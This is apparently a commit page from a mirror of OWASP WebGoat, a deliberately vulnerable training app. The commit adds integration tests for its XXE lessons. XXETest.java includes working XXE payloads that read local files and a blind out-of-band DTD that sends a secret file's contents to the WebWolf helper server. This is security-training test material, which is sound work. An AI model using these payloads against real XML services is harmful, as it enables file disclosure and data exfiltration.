dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

First steps in XXE integration tests

Browse Source
This commit is contained in:
Rene Zubcevic 2019-09-18 14:48:34 +02:00
parent 57e6a84cef
commit ec236a4ff5
5 changed files with 87 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
webgoat-container/src/main/resources/application-webgoat.properties
View File

@ -12,6 +12,7 @@ server.ssl.key-alias=${WEBGOAT_KEY_ALIAS:goat}
server.ssl.enabled=${WEBGOAT_SSLENABLED:false} server.ssl.enabled=${WEBGOAT_SSLENABLED:false}
security.require-ssl=${WEBGOAT_SSLENABLED:false} security.require-ssl=${WEBGOAT_SSLENABLED:false}
hsqldb.port=${WEBGOAT_HSQLPORT:9001}
spring.datasource.url=jdbc:hsqldb:hsql://${WEBGOAT_HOST:127.0.0.1}:${WEBGOAT_HSQLPORT:9001}/webgoat spring.datasource.url=jdbc:hsqldb:hsql://${WEBGOAT_HOST:127.0.0.1}:${WEBGOAT_HSQLPORT:9001}/webgoat
spring.jpa.hibernate.ddl-auto=update spring.jpa.hibernate.ddl-auto=update
spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.HSQLDialect spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.HSQLDialect

11
webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
View File

@ -21,12 +21,11 @@ import static io.restassured.RestAssured.given;
public abstract class IntegrationTest { public abstract class IntegrationTest {
protected static int WG_PORT = 8080; protected static int WG_PORT = 8081;
protected static int WW_PORT = 9090; protected static int WW_PORT = 9090;
private static String WEBGOAT_URL = "http://127.0.0.1:" + WG_PORT + "/WebGoat/"; private static String WEBGOAT_URL = "http://127.0.0.1:" + WG_PORT + "/WebGoat/";
private static String WEBWOLF_URL = "http://127.0.0.1:" + WW_PORT + "/"; private static String WEBWOLF_URL = "http://127.0.0.1:" + WW_PORT + "/";
//This also allows to test the application with HTTPS when outside testing option is used //This also allows to test the application with HTTPS when outside testing option is used
protected static RestAssuredConfig restConfig = RestAssuredConfig.newConfig().sslConfig(new SSLConfig().relaxedHTTPSValidation()); protected static RestAssuredConfig restConfig = RestAssuredConfig.newConfig().sslConfig(new SSLConfig().relaxedHTTPSValidation());
@ -41,16 +40,18 @@ public abstract class IntegrationTest {
@BeforeClass @BeforeClass
public static void beforeAll() { public static void beforeAll() {
if (!started) {
if (!started) {
started = true; started = true;
if (!isAlreadyRunning(WG_PORT)) { if (!isAlreadyRunning(WG_PORT)) {
SpringApplicationBuilder wgs = new SpringApplicationBuilder(StartWebGoat.class) SpringApplicationBuilder wgs = new SpringApplicationBuilder(StartWebGoat.class)
.properties(Map.of("spring.config.name", "application-webgoat", "WEBGOAT_PORT", WG_PORT)); .properties(Map.of("spring.config.name", "application-webgoat,application-inttest", "WEBGOAT_PORT", WG_PORT));
wgs.run(); wgs.run();
} }
if (!isAlreadyRunning(WW_PORT)) { if (!isAlreadyRunning(WW_PORT)) {
SpringApplicationBuilder wws = new SpringApplicationBuilder(WebWolf.class) SpringApplicationBuilder wws = new SpringApplicationBuilder(WebWolf.class)
.properties(Map.of("spring.config.name", "application-webwolf", "WEBWOLF_PORT", WW_PORT)); .properties(Map.of("spring.config.name", "application-webwolf,application-inttest", "WEBWOLF_PORT", WW_PORT));
wws.run(); wws.run();
} }
} }

73
webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java Normal file
View File

@ -0,0 +1,73 @@
package org.owasp.webgoat;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import org.hamcrest.CoreMatchers;
import org.junit.Assert;
import org.junit.Test;
import io.restassured.RestAssured;
import io.restassured.http.ContentType;
public class XXETest extends IntegrationTest {
private static final String xxe3 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>";
private static final String xxe4 = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE user [<!ENTITY xxe SYSTEM \"file:///\">]><comment><text>&xxe;test</text></comment>";
private static final String dtd7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!ENTITY % file SYSTEM \"file://SECRET\"><!ENTITY % all \"<!ENTITY send SYSTEM 'WEBWOLFURLlanding?text=%file;'>\">%all;";
private static final String xxe7 = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM \"WEBWOLFURL/USERNAME/blind.dtd\">%remote;]><comment><text>test&send;</text></comment>";
private String webGoatHomeDirectory = System.getProperty("user.dir").concat("/target/.webgoat");
private String webwolfFileDir = System.getProperty("user.dir").concat("/target/webwolf-fileserver");
@Test
public void runTests() throws IOException {
startLesson("XXE");
checkAssignment(url("/WebGoat/xxe/simple"),ContentType.XML,xxe3,true);
checkAssignment(url("/WebGoat/xxe/content-type"),ContentType.XML,xxe4,true);
Path webWolfFilePath = Paths.get(webwolfFileDir);
if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")).toFile().exists()) {
System.out.println("delete file");
Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")));
}
String secretFile = webGoatHomeDirectory.concat("/XXE/secret.txt");
String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("")).replace("SECRET", secretFile);
System.out.println(dtd7String);
RestAssured.given()
.when()
.config(restConfig)
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.multiPart("file", "blind.dtd", dtd7String.getBytes())
.post(webWolfUrl("/WebWolf/fileupload"))
.then()
.extract().response().getBody().asString();
String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/WebWolf/files")).replace("USERNAME", getWebgoatUser());
System.out.println(xxe7String);
checkAssignment(url("/WebGoat/xxe/blind?send=test"),ContentType.XML,xxe7String,false );
//checkResults("/XXE/");
}
public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) {
Assert.assertThat(
RestAssured.given()
.when()
.config(restConfig)
.contentType(contentType)
.cookie("JSESSIONID", getWebGoatCookie())
.body(body)
.post(url)
.then()
.log().all()
.statusCode(200)
.extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
}
}

6
webgoat-integration-tests/src/test/resources/application-inttest.properties Normal file
View File

@ -0,0 +1,6 @@
webgoat.user.directory=${user.dir}/target/.webgoat
webgoat.server.directory=${user.dir}/target/.webgoat
webwolf.fileserver.location=${user.dir}/target/webwolf-fileserver
spring.jpa.hibernate.ddl-auto=create-drop

2
webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
View File

@ -67,7 +67,7 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
attackResult = failed().feedback("xxe.content.type.feedback.json").build(); attackResult = failed().feedback("xxe.content.type.feedback.json").build();
} }
if (MediaType.APPLICATION_XML_VALUE.equals(contentType)) { if (null != contentType && contentType.contains(MediaType.APPLICATION_XML_VALUE)) {
String error = ""; String error = "";
try { try {
Comment comment = comments.parseXml(commentStr); Comment comment = comments.parseXml(commentStr);